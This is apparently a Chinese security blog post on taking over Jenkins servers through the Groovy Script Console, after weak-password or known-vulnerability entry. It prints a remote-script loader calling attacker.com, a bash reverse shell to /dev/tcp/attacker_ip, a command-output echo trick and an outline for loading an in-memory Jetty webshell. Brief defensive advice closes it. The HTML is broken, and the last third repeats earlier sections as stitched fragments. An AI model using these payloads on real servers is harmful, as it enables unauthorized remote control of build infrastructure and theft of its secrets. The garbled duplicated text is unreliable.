Jenkins框架之Groovy Getshell技术研究<\/h1>

环境搭建<\/h2>
Jenkins环境搭建有多种方法，为方便起见，可以直接使用P神提供的现成环境。搭建成功后应确保Jenkins服务正常运行。<\/p>

利用思路分析<\/h2>

历史漏洞利用<\/h3>

可搜索Jenkins历史漏洞进行利用<\/li>

参考工具：JenkinsExploit-GUI (https:\/\/github.com\/TheBeastofwar\/JenkinsExploit-GUI)<\/li> <\/ol>

弱口令利用<\/h3>

当历史漏洞无法利用时，弱口令是最有效的突破口<\/li>

成功登录后结合Groovy脚本进行进一步利用<\/li> <\/ul>

Groovy代码执行方法<\/h2>

1. GroovyShell<\/h3>

高版本JNDI中也有使用<\/li>
形式类似于SPEL模板注入<\/li>

可直接解析脚本文件<\/li> <\/ul>

示例Groovy脚本（弹出计算器）：<\/p>

"calc"<\/span>.<\/span>execute<\/span>()<\/span>
<\/span><\/span><\/code><\/pre>2. GroovyScriptEngine<\/h3>

直接加载脚本，支持多种来源：

文件系统<\/li>
URL<\/li>
数据库等<\/li>
<\/ul>
<\/li>
可利用远程URL加载脚本<\/li>
使用方法：本地开启HTTP服务托管脚本<\/li>
<\/ul>
示例：<\/p>
def<\/span> scriptEngine =<\/span> new<\/span> GroovyScriptEngine(<\/span>new<\/span> URL(<\/span>"http:\/\/attacker.com\/malicious.groovy"<\/span>))<\/span>
<\/span><\/span>scriptEngine.<\/span>run<\/span>(<\/span>"malicious"<\/span>,<\/span> new<\/span> Binding())<\/span>
<\/span><\/span><\/code><\/pre>3. GroovyClassLoader<\/h3>

可加载字节码<\/li>
在内存马利用中特别有用<\/li>
<\/ul>
回显实现<\/h2>
Groovy实现回显非常简单，只需添加println<\/code>语句：<\/p>
println "Command output: ${'whoami'.execute().text}"<\/span>
<\/span><\/span><\/code><\/pre>Jenkins中的Groovy利用<\/h2>
后台执行位置<\/h3>
Jenkins后台提供了执行Groovy脚本的功能区域，位于"Manage Jenkins" -> "Script Console"。<\/p>
出网Getshell<\/h3>

编写反弹shell的Groovy脚本<\/li>
示例反弹shell脚本（可通过GPT生成）：<\/li>
<\/ol>
def<\/span> cmd =<\/span> "bash -i >& \/dev\/tcp\/attacker_ip\/port 0>&1"<\/span>
<\/span><\/span>cmd.<\/span>execute<\/span>()<\/span>
<\/span><\/span><\/code><\/pre>
执行后成功获取反弹shell<\/li>
<\/ol>
不出网Getshell（内存马）<\/h3>

分析中间件：Jenkins使用Jetty作为中间件<\/li>
生成Jetty内存马<\/li>
使用GroovyClassLoader加载内存马字节码<\/li>
连接方式：冰蝎等工具<\/li>
<\/ol>
关键点总结<\/h2>

环境准备<\/strong>：确保Jenkins环境可访问，最好使用docker快速搭建<\/li>
入口选择<\/strong>：优先尝试弱口令，其次历史漏洞<\/li>
脚本执行<\/strong>：掌握三种Groovy执行方式及其适用场景<\/li>
回显技巧<\/strong>：利用println实现简单回显<\/li>
Getshell方式<\/strong>：

出网：直接执行反弹shell命令<\/li>
不出网：通过GroovyClassLoader加载内存马<\/li>
<\/ul>
<\/li>
工具准备<\/strong>：

脚本托管HTTP服务<\/li>
冰蝎等连接工具<\/li>
内存马生成工具<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

加强Jenkins访问控制，禁用匿名访问<\/li>
使用强密码策略，避免弱口令<\/li>
及时更新Jenkins版本，修复已知漏洞<\/li>
限制Script Console的使用权限<\/li>
监控异常进程和网络连接<\/li>
<\/ol>

Jenkins框架之Groovy Getshell技术研究<\/h1>

环境搭建<\/h2> Jenkins环境搭建有多种方法，为方便起见，可以直接使用P神提供的现成环境。搭建成功后应确保Jenkins服务正常运行。<\/p>

利用思路分析<\/h2>

Groovy代码执行方法<\/h2>

Jenkins中的Groovy利用<\/h2>

后台执行位置<\/h3> Jenkins后台提供了执行Groovy脚本的功能区域，位于"Manage Jenkins" -> "Script Console"。<\/p>

防御建议<\/h2> 加强Jenkins访问控制，禁用匿名访问<\/li> 使用强密码策略，避免弱口令<\/li> 及时更新Jenkins版本，修复已知漏洞<\/li> 限制Script Console的使用权限<\/li> 监控异常进程和网络连接<\/li> <\/ol>

环境搭建<\/h2>
Jenkins环境搭建有多种方法，为方便起见，可以直接使用P神提供的现成环境。搭建成功后应确保Jenkins服务正常运行。<\/p>

后台执行位置<\/h3>
Jenkins后台提供了执行Groovy脚本的功能区域，位于"Manage Jenkins" -> "Script Console"。<\/p>

防御建议<\/h2>

加强Jenkins访问控制，禁用匿名访问<\/li>
使用强密码策略，避免弱口令<\/li>
及时更新Jenkins版本，修复已知漏洞<\/li>
限制Script Console的使用权限<\/li>
监控异常进程和网络连接<\/li> <\/ol>